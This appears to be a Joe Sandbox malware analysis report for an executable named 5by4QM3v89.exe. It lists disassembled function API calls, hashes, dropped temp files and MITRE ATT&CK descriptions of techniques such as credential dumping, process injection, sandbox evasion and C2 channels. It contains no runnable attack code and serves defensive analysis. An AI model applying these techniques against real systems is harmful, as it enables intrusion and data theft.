Part of subcall function 0040BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003D195E,?), ref: 0040BFFE
Part of subcall function 0040BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0040C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003D196D

Strings

WIN_XPe, xrefs: 003D1788

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 3ac3c73c72d3d15df2e22f90cb9e4cd1cfd4be4dfc0a0550e06dfffcdfd3c9c3
Instruction ID: 97144fa2e83d0bdfa030ac2fac8d7c5a68d60e99336b1a7c6a2a204847f37a2d
Opcode Fuzzy Hash: 3ac3c73c72d3d15df2e22f90cb9e4cd1cfd4be4dfc0a0550e06dfffcdfd3c9c3
Instruction Fuzzy Hash: BAF0ED72804109EFDB16DB91D984BECBBF8BB08305F5400A6E102B35A1D7758F85DF68

Function 00415964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0041596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00415981

Part of subcall function 003F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC

Strings

Shell_TrayWnd, xrefs: 00415967

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6a95aa948926db7450e4f788a0baf0b0eac34570612f186966b84303ba4eff7c
Instruction ID: 9fbed335455bceea917cfaf0dc60cc42b87b45b2632ec5e2b9789c87154da999
Opcode Fuzzy Hash: 6a95aa948926db7450e4f788a0baf0b0eac34570612f186966b84303ba4eff7c
Instruction Fuzzy Hash: C1D01231784711BBE664BB709C0FFE76A15BF00B51F104839B34DAE1D2C9F49805C658

Function 00415998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004159AE
PostMessageW.USER32(00000000), ref: 004159B5

Part of subcall function 003F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC

Strings

Shell_TrayWnd, xrefs: 004159A7

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 28b0018ffaa18ab054c8df8029b6ad1d3e86b7c55b1f2fc4b4addf1b5fe03982
Instruction ID: c82fe1b4aaf29e39c33dd0a463c2831e5441f2113495a16f7dad4c4b1ee61b08
Opcode Fuzzy Hash: 28b0018ffaa18ab054c8df8029b6ad1d3e86b7c55b1f2fc4b4addf1b5fe03982
Instruction Fuzzy Hash: 0FD0C9317807117AE664AB709C0BFD66615BB04B51F104839B349AA1D2C9E4A805C658

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5by4QM3v89.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autB5BA.tmp

C:\Users\user\AppData\Local\Temp\j29251pK6

C:\Users\user\AppData\Local\Temp\nondefinition

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
5by4QM3v89.exe

Function 00393B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 003949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00394E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 003F9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0039301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00393041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0039708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00393633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00393A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00393766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0039F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 01318070 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 003939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre